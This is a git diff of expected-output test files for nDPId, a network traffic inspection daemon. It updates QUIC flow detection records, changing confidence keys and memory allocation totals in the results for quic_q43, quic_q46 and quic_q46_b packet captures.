02242{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1,"source":"quic_q43.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":1,"flow_last_seen":1592388060203,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":1392,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":1392,"pkt_l4_len":1358,"thread_ts_msec":1592388060203,"pkt":"AAAAAAAAAA0A1ZJ\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\/tFGrck4XfPyIJIy1Wp2EOyj96Sbv5OxbQ7GtzdqXVHstRevTu5j9sOKKoV3MEbVEwNDMB6IFgkpIa6H7tgIaiFYKRXuiYTDAwMDAwMDAwL8w4xnPBiaheNE18yX+i9poR99hBRVNHfnKffIxl9aDtAhVkrBteYAAAAABYNTA5AQAAAB4AAADs\/0Yi1mMvJ+MeFLVM06sFxTPtG7icgHbJd6FPguzZ5DspSAr1qmJOAogGqdfyO9QJ05Fvsk1n4Zg7QCWE0DkiZAAAAAEAAABDMjU1W+x30vZEmVNOU1RQW+x30vZEmVNgMsuSoEFN3\/mAAgAAAPAAAABgAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"} -00706{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1,"source":"quic_q43.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1592388060203,"flow_last_seen":1592388060203,"flow_idle_time":200000,"flow_min_l4_payload_len":1350,"flow_max_l4_payload_len":1350,"flow_tot_l4_payload_len":1350,"flow_avg_l4_payload_len":1350,"midstream":0,"thread_ts_msec":1592388060203,"l3_proto":"ip4","src_ip":"51.120.20.202","dst_ip":"72.119.217.29","src_port":49241,"dst_port":443,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"QUIC.DoH_DoT","breed":"Fun","category":"Network"},"quic": {"client_requested_server_name":"dns.google.com"}} 
+00706{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1,"source":"quic_q43.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1592388060203,"flow_last_seen":1592388060203,"flow_idle_time":200000,"flow_min_l4_payload_len":1350,"flow_max_l4_payload_len":1350,"flow_tot_l4_payload_len":1350,"flow_avg_l4_payload_len":1350,"midstream":0,"thread_ts_msec":1592388060203,"l3_proto":"ip4","src_ip":"51.120.20.202","dst_ip":"72.119.217.29","src_port":49241,"dst_port":443,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"QUIC.DoH_DoT","breed":"Fun","category":"Network"},"quic": {"client_requested_server_name":"dns.google.com"}} 00473{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2,"source":"quic_q43.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":2,"flow_last_seen":1592388060251,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":72,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":72,"pkt_l4_len":38,"thread_ts_msec":1592388060251,"pkt":"AAAAAAAAAAoAtmi7CABFAAA6AABAADsR1dxId9kdM3gUygG7wFkAJsU\/COg8d72PiRX5AdVtByTcf3A7ZqGOSkABJDYBAAYA"} -00684{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2,"source":"quic_q43.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1592388060203,"flow_last_seen":1592388060251,"flow_idle_time":200000,"flow_min_l4_payload_len":30,"flow_max_l4_payload_len":1350,"flow_tot_l4_payload_len":1380,"flow_avg_l4_payload_len":690,"midstream":0,"thread_ts_msec":1592388060251,"l3_proto":"ip4","src_ip":"51.120.20.202","dst_ip":"72.119.217.29","src_port":49241,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"QUIC.DoH_DoT","breed":"Fun","category":"Network"}} 
+00684{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2,"source":"quic_q43.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1592388060203,"flow_last_seen":1592388060251,"flow_idle_time":200000,"flow_min_l4_payload_len":30,"flow_max_l4_payload_len":1350,"flow_tot_l4_payload_len":1380,"flow_avg_l4_payload_len":690,"midstream":0,"thread_ts_msec":1592388060251,"l3_proto":"ip4","src_ip":"51.120.20.202","dst_ip":"72.119.217.29","src_port":49241,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"QUIC.DoH_DoT","breed":"Fun","category":"Network"}} 00553{"daemon_event_id":3,"daemon_event_name":"shutdown","thread_id":0,"packet_id":2,"source":"quic_q43.pcap","alias":"nDPId-test","packets-captured":2,"packets-processed":2,"total-skipped-flows":0,"total-l4-payload-len":1380,"total-not-detected-flows":0,"total-guessed-flows":0,"total-detected-flows":1,"total-detection-updates":0,"total-updates":0,"current-active-flows":0,"total-active-flows":1,"total-idle-flows":1,"total-compressions":0,"total-compression-diff":0,"current-compression-diff":0,"total-events-serialized":8,"global_ts_msec":1592388060251} ~~~~~~~~~~~~~~~~~~~~ SUMMARY ~~~~~~~~~~~~~~~~~~~~ ~~ packets captured/processed: 2/2 @@ -14,9 +14,9 @@ ~~ total active/idle flows...: 1/1 ~~ total timeout flows.......: 0 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~ total memory allocated....: 5869501 bytes -~~ total memory freed........: 5869501 bytes -~~ total allocations/frees...: 118116/118116 +~~ total memory allocated....: 6003135 bytes +~~ total memory freed........: 6003135 bytes +~~ total allocations/frees...: 120878/120878 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ ~~ json string min len.......: 464 chars ~~ json string max len.......: 2247 chars diff --git a/test/results/quic_q46.pcap.out b/test/results/quic_q46.pcap.out index 7abb56a7d..c64c58bf5 100644 
--- a/test/results/quic_q46.pcap.out +++ b/test/results/quic_q46.pcap.out 
@@ -2,10 +2,10 @@ 00548{"daemon_event_id":4,"daemon_event_name":"status","thread_id":0,"packet_id":1,"source":"quic_q46.pcap","alias":"nDPId-test","packets-captured":1,"packets-processed":0,"total-skipped-flows":0,"total-l4-payload-len":0,"total-not-detected-flows":0,"total-guessed-flows":0,"total-detected-flows":0,"total-detection-updates":0,"total-updates":0,"current-active-flows":0,"total-active-flows":0,"total-idle-flows":0,"total-compressions":0,"total-compression-diff":0,"current-compression-diff":0,"total-events-serialized":2,"global_ts_msec":1559632338055} 00589{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1,"source":"quic_q46.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1559632338055,"flow_last_seen":1559632338055,"flow_idle_time":200000,"flow_min_l4_payload_len":1350,"flow_max_l4_payload_len":1350,"flow_tot_l4_payload_len":1350,"flow_avg_l4_payload_len":1350,"midstream":0,"thread_ts_msec":1559632338055,"l3_proto":"ip4","src_ip":"172.29.42.236","dst_ip":"153.20.183.203","src_port":38292,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 
02247{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1,"source":"quic_q46.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":1,"flow_last_seen":1559632338055,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":1392,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":1392,"pkt_l4_len":1358,"thread_ts_msec":1559632338055,"pkt":"AAAAAAAAAAAA4JDHCABFAAVic3hAAD8RmymsHSrsmRS3y5WUAbsFTk\/Qw1EwNDZQ6s\/m5wbfJy0AAAAEYNpYkp9oOdCGDvxYpAEEAAQAQ0hMTxoAAABQQUQAtgEAAFNOSQDFAQAAU1RLAP0BAABTTk8AMQIAAFZFUgA1AgAAQ0NTAEUCAABOT05DZQIAAEFFQURpAgAAVUFJRJQCAABTQ0lEpAIAAFRDSUSoAgAAUERNRKwCAABTTUhMsAIAAElDU0y0AgAATk9OUNQCAABQVUJT9AIAAE1JRFP4AgAAU0NMU\/wCAABLRVhTAAMAAFhMQ1QIAwAAQ1NDVAgDAABDT1BUDAMAAENDUlQcAwAASVJUVCADAABDRkNXJAMAAFNGQ1coAwAALS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tcGxheS5nb29nbGUuY29tTF5QaJRKaTNoSpJ2byVw\/n2jR\/SXiDAUaxRXCyDlaH13oYGRvmmLh5UfnwV+qkP8rBLql6P0cVhpCGDXJyou7qdg+dnByWJAkTSY+CUh8yfYOYMRdIFYIeO6ZKEQGzvhOWxsGdkkbQk0joNdUTA0NgHogWCSkhrofu2AhqIVgpFc9hnRMDAwMDAwMDAg1WpdFEihkws6cxoJh1cnEudv5EFFU0dDaHJvbWUvNzQuMC4zNzI5LjE1NyBBbmRyb2lkIDguMC4wOyBCTkQtTDIxqZ2LiTEPPlI5bOtRl2sWwwAAAABYNTA5AQAAAB4AAAA+5+ExAY9KZ43WAi5gboQGad\/XZY9NgsCyvAvlen24imYZuixux5QJ4+eD6hkpSGJfDn9+XBFyJ61rFG0t2MkrZAAAAAEAAABDMjU1M\/in8FpHdkpOU1RQM\/in8FpHdkpn+K3FgBXj\/3u4AAAAAPAAAABgAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"} -00770{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1,"source":"quic_q46.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1559632338055,"flow_last_seen":1559632338055,"flow_idle_time":200000,"flow_min_l4_payload_len":1350,"flow_max_l4_payload_len":1350,"flow_tot_l4_payload_len":1350,"flow_avg_l4_payload_len":1350,"midstream":0,"thread_ts_msec":1559632338055,"l3_proto":"ip4","src_ip":"172.29.42.236","dst_ip":"153.20.183.203","src_port":38292,"dst_port":443,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"QUIC.Google","breed":"Acceptable","category":"Web"},"quic": {"client_requested_server_name":"play.google.com","user_agent":"Chrome\/74.0.3729.157 Android 8.0.0; BND-L21"}} +00770{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1,"source":"quic_q46.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1559632338055,"flow_last_seen":1559632338055,"flow_idle_time":200000,"flow_min_l4_payload_len":1350,"flow_max_l4_payload_len":1350,"flow_tot_l4_payload_len":1350,"flow_avg_l4_payload_len":1350,"midstream":0,"thread_ts_msec":1559632338055,"l3_proto":"ip4","src_ip":"172.29.42.236","dst_ip":"153.20.183.203","src_port":38292,"dst_port":443,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"QUIC.Google","breed":"Acceptable","category":"Web"},"quic": {"client_requested_server_name":"play.google.com","user_agent":"Chrome\/74.0.3729.157 Android 8.0.0; BND-L21"}} 
00481{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2,"source":"quic_q46.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":2,"flow_last_seen":1559632338083,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1559632338083,"pkt":"AAAAAAAAAAAA4JDHCABFAABAAABAADQRHsSZFLfLrB0q7AG7lZQALNrDw1EwNDYF6s\/m5wbfJy0AAAAFbGsm7eq1vsQbMX0cQAQkIAMA"} 02257{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3,"source":"quic_q46.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":3,"flow_last_seen":1559632338308,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":1392,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":1392,"pkt_l4_len":1358,"thread_ts_msec":1559632338308,"pkt":"AAAAAAAAAAAA4JDHCABFgAViAABAADURGCKZFLfLrB0q7AG7lZQFTiJnQAtQvT4L41LYkTDHbWnvY3Q7xNlk7lPAOJoU7qSEDNxr\/eXA5HdvGouKSa5JA+EfJXVcrF5I8JeTQOik+2bWgM1nMhrT0SQGJgoDC3vmiFQsGJJjkMZScnfQIf1wQxM8bMy1rX9IG5gNouAF2UDgTxNWxp8Z+kpanynzPm9Aewt1Q8YQSGSHVmFR2wS\/qJorTHWD8seoBDxiXr\/Jrzhp+T4G7aWy+PK4peW1lunM5ZwayH+2G6AF72mr+9NShIq31T+R\/i7G00e0d8lC08arFgrP7xbHltzNsevJw7TO7heoxYjLOdwd79cQPJBHGN6cAkZED6B76kDGTUdX1AYSpun6LhwRHlxgVuFQtfE7y\/DnLBUYzAcWntPYNYvGghUNITCLh8lnobrCJOOpgpG31oH5+kuwGIUSXbKA+01pRlfgd5gXolZKhK3pWOerj\/frjDS+2g8vClgYRT1+lV7rb2y\/Iik5yjyOhRlKWs5VLZ7VCWYVKqICcZsTvon\/NMVVMYb6HJJ32Yz2ORvo8ebpxTje4yqrxC+qapfY5RwYmEaDmI1L2w04UoqZ0dJ1NSSxDm6HXMu+ZshF6SujBNEG42mGdRf6IaSoNlxzMkSyrtk+YmufaVAWXNamgtbe+ZtSIpyI7W+63DDWITJezj4w9w00cUFEntoLNlOB+zElDxYScTOE3CpSs44g2fcVw+4rvMHfwuxPeTdHzp4MAsePKq+zngj\/90JBFE\/tDfTVYbaRpu5lmM3pDSvtX0fT5TvOH843VTAPlB2fm8MHtEMU7PIrg8lvLI5kYBqaI59yOALOtxEFcXeKMhTylktz05RjIrZg6ifgDckMo48nJYsJtSpscdyoK9zfGzj4NaovMFvwwWNIopaYds\/P+xBZkC90KYsz06jFDLqNdcZXDkHaPFJXZAxXx9set1Fg3lj6r\/AobA8N7sLKydAgxC\/rtEWCBX5wbSuX8kpFOJgGKfLdk0JYmC7zbnJyfyy+C6ukhZHN0cU81AFqszDmIIshOZAY4iWz5aWIzL1ctZtibQ5iLAcoUfb250TuivT+F
GWq8x3DLfXpYTdXUgbMkK8lTQJuOYtFhD4fHRbg8qZIkwDODXwLSUcnqUn+Q2uzh8PtHzNYdam5Obh2M8GgLW8ukG2P6sOp8CokFzXYzFsiExtyxRsQxvskOlQmLevtIDnsShgWKCRO7UN+uhRGaYGLmSq2\/5t1JyMiF0cem8I\/nOK0mRwXY7N+ECcoaRDXyTKJR\/4pe4u8s4tPdTtCzoa7o8ItJAgr6FkTuYLEo2hwMyPm4hV38utdskBYyUhI6Vz27vbgYAi5nzlUMaKyr3bk72PVb2h6cE+5pbWp8t27oXh4ceZgCJ1CqxGsEI5zHMEsBX6U\/74OCgAAVZMzKh0lFrwDdkIuV+i7biu6I3DoZxr1X50m6VKkaA+qvAjpG+BPOMuRH3\/5\/vE6iwiiUVaV8HIEZpVud+gx9Rzu573VwQ87CJfVs7RmgLI88d6qzIEQAYp5JQrr2lJf1+r4xl60u3ZAa+E+ox2R3gSbE67e9uWolVz8QS9Ep2IK7cfXKJOfNxu70MQcIVFRson71WUtcVpILsaqgb9rATvfzoNmtskVITRoIpqD+mi2ZJvPx6FmM5uP7YQiAppyWykt6puGjRFKGSfbt2gGFGLSdxE20Jo0zgDKZvUFlb4u07xu5j8JVjk7HreBYMQixh6ugURELWsT7GFnQi1VQvh64jRAmDcuARkYMw2228CWbF39WsM9a4SaEoLaEPaqo3lcdKo0+Sgn7WsqvH1w"} -00691{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":20,"source":"quic_q46.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"finished","flow_packets_processed":20,"flow_first_seen":1559632338055,"flow_last_seen":1559632338367,"flow_idle_time":200000,"flow_min_l4_payload_len":28,"flow_max_l4_payload_len":1350,"flow_tot_l4_payload_len":20401,"flow_avg_l4_payload_len":1020,"midstream":0,"thread_ts_msec":1559632338367,"l3_proto":"ip4","src_ip":"172.29.42.236","dst_ip":"153.20.183.203","src_port":38292,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"QUIC.Google","breed":"Acceptable","category":"Web"}} 
+00691{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":20,"source":"quic_q46.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"finished","flow_packets_processed":20,"flow_first_seen":1559632338055,"flow_last_seen":1559632338367,"flow_idle_time":200000,"flow_min_l4_payload_len":28,"flow_max_l4_payload_len":1350,"flow_tot_l4_payload_len":20401,"flow_avg_l4_payload_len":1020,"midstream":0,"thread_ts_msec":1559632338367,"l3_proto":"ip4","src_ip":"172.29.42.236","dst_ip":"153.20.183.203","src_port":38292,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"QUIC.Google","breed":"Acceptable","category":"Web"}} 00557{"daemon_event_id":3,"daemon_event_name":"shutdown","thread_id":0,"packet_id":20,"source":"quic_q46.pcap","alias":"nDPId-test","packets-captured":20,"packets-processed":20,"total-skipped-flows":0,"total-l4-payload-len":20401,"total-not-detected-flows":0,"total-guessed-flows":0,"total-detected-flows":1,"total-detection-updates":0,"total-updates":0,"current-active-flows":0,"total-active-flows":1,"total-idle-flows":1,"total-compressions":0,"total-compression-diff":0,"current-compression-diff":0,"total-events-serialized":9,"global_ts_msec":1559632338367} ~~~~~~~~~~~~~~~~~~~~ SUMMARY ~~~~~~~~~~~~~~~~~~~~ ~~ packets captured/processed: 20/20 @@ -15,9 +15,9 @@ ~~ total active/idle flows...: 1/1 ~~ total timeout flows.......: 0 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~ total memory allocated....: 5870067 bytes -~~ total memory freed........: 5870067 bytes -~~ total allocations/frees...: 118135/118135 +~~ total memory allocated....: 6003701 bytes +~~ total memory freed........: 6003701 bytes +~~ total allocations/frees...: 120897/120897 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ ~~ json string min len.......: 464 chars ~~ json string max len.......: 2262 chars 
diff --git a/test/results/quic_q46_b.pcap.out b/test/results/quic_q46_b.pcap.out index 05afd3b8d..abc4a56c0 100644 --- a/test/results/quic_q46_b.pcap.out +++ b/test/results/quic_q46_b.pcap.out 
@@ -2,10 +2,10 @@ 00550{"daemon_event_id":4,"daemon_event_name":"status","thread_id":0,"packet_id":1,"source":"quic_q46_b.pcap","alias":"nDPId-test","packets-captured":1,"packets-processed":0,"total-skipped-flows":0,"total-l4-payload-len":0,"total-not-detected-flows":0,"total-guessed-flows":0,"total-detected-flows":0,"total-detection-updates":0,"total-updates":0,"current-active-flows":0,"total-active-flows":0,"total-idle-flows":0,"total-compressions":0,"total-compression-diff":0,"current-compression-diff":0,"total-events-serialized":2,"global_ts_msec":1561708873328} 00591{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1,"source":"quic_q46_b.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1561708873328,"flow_last_seen":1561708873328,"flow_idle_time":200000,"flow_min_l4_payload_len":1350,"flow_max_l4_payload_len":1350,"flow_tot_l4_payload_len":1350,"flow_avg_l4_payload_len":1350,"midstream":0,"thread_ts_msec":1561708873328,"l3_proto":"ip4","src_ip":"172.27.69.216","dst_ip":"110.231.134.35","src_port":45530,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 
02313{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1,"source":"quic_q46_b.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":1,"flow_last_seen":1561708873328,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":1440,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":1440,"pkt_l4_len":1358,"thread_ts_msec":1561708873328,"pkt":"AAAAAAAAAAIAGNwmCABFAAViWnxAAD0R9xCsG0XYbueGI7HaAbsFTnXjw1EwNDZQ0aOrrPYcbNEAAAABZ49NM0tlJ\/QWOEX0oAEEAENITE8ZAAAAUEFEAOsBAABTTkkA\/QEAAFNUSwAzAgAAVkVSADcCAABDQ1MARwIAAE5PTkNnAgAAQUVBRGsCAABVQUlEmAIAAFNDSUSoAgAAVENJRKwCAABQRE1EsAIAAFNNSEy0AgAASUNTTLgCAABOT05Q2AIAAFBVQlP4AgAATUlEU\/wCAABTQ0xTAAMAAEtFWFMEAwAAWExDVAwDAABDU0NUDAMAAENPUFQUAwAAQ0NSVCQDAABJUlRUKAMAAENGQ1csAwAAU0ZDVzADAAAtLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLXVwbG9hZC55b3V0dWJlLmNvbXgDMRgyNKjZnbeNIexiej4o7qx+V929kxA9dDLsNr49+J4e7Bxt\/tr6btXxr2ajG15fa3Ruq1EwNDYB6IFgkpIa6H7tgIaiFYKRXRXJTjAwMDAwMDAw6FYYVlvjBaujP6e+o70a5ZenNg5BRVNHY29tLmdvb2dsZS5hbmRyb2lkLnlvdXR1YmUgQ3JvbmV0Lzc2LjAuMzgwOS4w1Y68K3sgywV7JQccxBohdQAAAABYNTA5AQAAAB4AAACrpFnJA5r+YO5RcQGpd1l4yFvK+8akrX8Ivr05rqkgauMBpMQ6cwQFDJS6sLs7Du5\/2eIOY7vG9b+CMCy0OZxEZAAAAAEAAABDMjU1jtxYjsj\/DkhJRldhQUtEM47cWI7I\/w5IZ\/itxYAV4\/+8OAwAAADwAAAAYAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"} -00779{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1,"source":"quic_q46_b.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1561708873328,"flow_last_seen":1561708873328,"flow_idle_time":200000,"flow_min_l4_payload_len":1350,"flow_max_l4_payload_len":1350,"flow_tot_l4_payload_len":1350,"flow_avg_l4_payload_len":1350,"midstream":0,"thread_ts_msec":1561708873328,"l3_proto":"ip4","src_ip":"172.27.69.216","dst_ip":"110.231.134.35","src_port":45530,"dst_port":443,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"QUIC.YouTubeUpload","breed":"Fun","category":"Media"},"quic": {"client_requested_server_name":"upload.youtube.com","user_agent":"com.google.android.youtube Cronet\/76.0.3809.0"}} +00779{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1,"source":"quic_q46_b.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1561708873328,"flow_last_seen":1561708873328,"flow_idle_time":200000,"flow_min_l4_payload_len":1350,"flow_max_l4_payload_len":1350,"flow_tot_l4_payload_len":1350,"flow_avg_l4_payload_len":1350,"midstream":0,"thread_ts_msec":1561708873328,"l3_proto":"ip4","src_ip":"172.27.69.216","dst_ip":"110.231.134.35","src_port":45530,"dst_port":443,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"QUIC.YouTubeUpload","breed":"Fun","category":"Media"},"quic": {"client_requested_server_name":"upload.youtube.com","user_agent":"com.google.android.youtube Cronet\/76.0.3809.0"}} 
00548{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2,"source":"quic_q46_b.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":2,"flow_last_seen":1561708873357,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":126,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":126,"pkt_l4_len":44,"thread_ts_msec":1561708873357,"pkt":"AAAAAAAAAAIAGNwmCABFAABAAABAADgRW69u54YjrBtF2AG7sdoALCZ3w1EwNDYF0aOrrPYcbNEAAAABKUO4TMFStZdbdRt4QAEkVwEAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"} 